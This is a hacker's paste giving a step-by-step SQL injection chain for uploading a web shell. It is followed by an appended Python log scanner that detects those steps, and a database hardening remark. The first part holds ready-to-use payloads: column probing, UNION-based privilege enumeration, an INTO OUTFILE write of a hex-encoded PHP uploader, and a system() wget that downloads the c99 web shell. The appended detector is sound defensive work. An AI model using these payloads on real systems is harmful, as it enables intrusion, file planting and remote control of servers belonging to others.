- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- Upload Shell Through SQL Query By zurael_sTz
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 ' : error sql
- ORDER BY
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 10-- : Unknown column '10' in 'order clause'Query Fail
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 9-- : Unknown column '9' in 'order clause'Query Fail
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 8-- : new error
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,2,3,4,5,6,7,8--
- Now we check whether we get a response from the server
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8--
- And yes, we got a response from the server
- YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- Now to locate a file
- This is the error
- F:\Lexus\indexPage\IndexOther.php
- We do it like this
- F:/Lexus/indexPage/name.txt
- F:/Lexus/indexPage/name.php
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4,5,6,7,8 INTO OUTFILE "F:/Lexus/indexPage/name.php"--
- <?system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -o script.php');?>
- "><? system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -O script.php');?>
- id=ddos) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile '/var/www/html/bWAPP/image/phpinfo.php'%23
- id=ddos) into outfile '/var/www/html/bWAPP/image/phpinfo' fields terminated by '<? phpinfo(); ?>'%23
- #zurael_sTz
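
Added example, not part of the original paste: a Python access-log scanner that tags the stages shown above (ORDER BY column probing, UNION SELECT, INFORMATION_SCHEMA.USER_PRIVILEGES enumeration, long hex literals, INTO OUTFILE) and lists the clients that reached the file-write step. The combined log format, the rule names, the helper names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per stage of the chain in this paste, matched on the decoded query.
RULES = [
    ("column_probe", re.compile(r"\border by \d+\b")),
    ("union_select", re.compile(r"\bunion( all)? select\b")),
    ("priv_enum", re.compile(r"\binformation_schema\.user_privileges\b")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{40,}\b")),
    ("file_write", re.compile(r"\binto (out|dump)file\b")),
]
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/')

def normalise(target):
    text = unquote_plus(unquote_plus(target))  # second pass catches double encoding
    text = re.sub(r"/\*.*?\*/", " ", text)     # inline comments used as whitespace
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    text = normalise(target)
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines):
    seen = {}  # client -> stages triggered, in first-seen order
    for m in filter(None, map(REQUEST.match, lines)):
        stages = classify(m.group(2))
        if stages:
            known = seen.setdefault(m.group(1), [])
            known.extend(s for s in stages if s not in known)
    return seen

def file_write_clients(lines):
    # INTO OUTFILE/DUMPFILE is the step that puts a file on the server's disk.
    return sorted(ip for ip, stages in scan(lines).items() if "file_write" in stages)

def _line(ip, cat_id):
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /indexpage/IndexOther.php'
            f'?cat=VAT%20-%20Assam&CatId={cat_id} HTTP/1.1" 200 512')

# Constructed sample log: documentation-range addresses, harmless 0x41... literal.
SAMPLE_LOG = [
    _line("198.51.100.9", "79"),
    _line("203.0.113.7", "79%20order%20by%2010--"),
    _line("203.0.113.7", "-79%20union%20select%201,(SELECT+GROUP_CONCAT(GRANTEE)+FROM+"
                         "INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8--"),
    _line("203.0.113.7", "-79%20UNION/**/SELECT%201,0x" + "41" * 30 + ",3,4,5,6,7,8"
                         "%20INTO%20OUTFILE%20%22F:/Lexus/indexPage/name.php%22--"),
]
```

On the database side, the file-write step depends on the application's MySQL account holding the FILE privilege and on `secure_file_priv` permitting writes to the target directory, so an account without FILE and a restrictive `secure_file_priv` stop it even where the injection exists.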